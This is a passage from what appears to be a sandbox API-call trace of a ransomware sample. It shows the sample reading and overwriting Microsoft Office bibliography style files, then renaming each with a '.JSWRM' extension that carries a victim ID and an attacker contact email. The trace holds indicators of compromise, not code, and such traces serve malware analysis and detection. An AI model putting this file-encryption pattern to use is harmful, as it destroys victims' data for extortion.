lpOverlapped=0x0) returned 1 [0128.524] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.524] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xfe0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xfe0, lpOverlapped=0x0) returned 1 [0128.525] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Author2XML.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\author2xml.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Author2XML.XSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\author2xml.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.527] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.527] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0128.528] CloseHandle (hObject=0x238) returned 1 [0128.528] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.528] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x8b60, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x8b60, lpOverlapped=0x0) returned 1 [0128.540] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.540] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x8b60, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x8b60, lpOverlapped=0x0) returned 1 [0128.541] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Sort\\AUTHOR.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\sort\\author.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Sort\\AUTHOR.XSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\sort\\author.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.544] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.544] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x8a50, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x8a50, lpOverlapped=0x0) returned 1 [0128.548] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.548] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x8a50, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x8a50, lpOverlapped=0x0) returned 1 [0128.549] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Sort\\TAG.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\sort\\tag.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Sort\\TAG.XSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\sort\\tag.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.551] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.551] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x8c30, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x8c30, lpOverlapped=0x0) returned 1 [0128.555] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.555] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x8c30, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x8c30, lpOverlapped=0x0) returned 1 [0128.556] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Sort\\TITLE.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\sort\\title.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Sort\\TITLE.XSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\sort\\title.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.557] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.557] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x8be0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x8be0, lpOverlapped=0x0) returned 1 [0128.561] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.561] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x8be0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x8be0, lpOverlapped=0x0) returned 1 [0128.562] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Sort\\YEAR.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\sort\\year.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Sort\\YEAR.XSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\sort\\year.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.566] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.566] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0128.568] CloseHandle (hObject=0x238) returned 1 [0128.568] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.569] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0128.618] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.618] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0128.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0128.620] CloseHandle (hObject=0x314) returned 1 [0128.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0128.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0128.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0128.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0128.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0128.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0128.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0128.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0128.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0128.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0128.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0128.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x24f208 [0128.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0128.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0128.620] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\apasixtheditionofficeonline.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\apasixtheditionofficeonline.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f208 | out: hHeap=0x1e0000) returned 1 [0128.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0128.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0128.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0128.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0128.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0128.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHICAGO.XSL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0128.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHICAGO.XSL", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CHICAGO.XSL", lpUsedDefaultChar=0x0) returned 11 [0128.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0128.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0128.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHICAGO.XSL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0128.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHICAGO.XSL", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CHICAGO.XSL", lpUsedDefaultChar=0x0) returned 11 [0128.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0128.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0128.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dff8 | out: hHeap=0x1e0000) returned 1 [0128.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0128.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0128.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0128.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\CHICAGO.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\chicago.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0128.623] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=297017) returned 1 [0128.623] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0128.623] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0128.635] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.635] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0128.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0128.635] CloseHandle (hObject=0x314) returned 1 [0128.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0128.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0128.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0128.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0128.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0128.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0128.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0128.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0128.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0128.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0128.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0128.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0128.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0128.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0128.636] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\CHICAGO.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\chicago.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\CHICAGO.XSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\chicago.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0128.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0128.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0128.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0128.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0128.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0128.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0128.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0128.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\GB.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\gb.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0128.638] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=268670) returned 1 [0128.638] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0128.638] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0128.650] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.650] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0128.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0128.651] CloseHandle (hObject=0x314) returned 1 [0128.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0128.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0128.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0128.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0128.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0128.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0128.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0128.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0128.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0128.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0128.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0128.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0128.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0128.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0128.652] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\GB.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\gb.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\GB.XSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\gb.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0128.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0128.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0128.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0128.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GostName.XSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0128.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GostName.XSL", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GostName.XSL", lpUsedDefaultChar=0x0) returned 12 [0128.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0128.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0128.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GostName.XSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0128.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GostName.XSL", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GostName.XSL", lpUsedDefaultChar=0x0) returned 12 [0128.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0128.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0128.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0128.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0128.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0128.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0128.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\GostName.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\gostname.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0128.654] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=256358) returned 1 [0128.654] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0128.654] ReadFile (in: hFile=0x314, 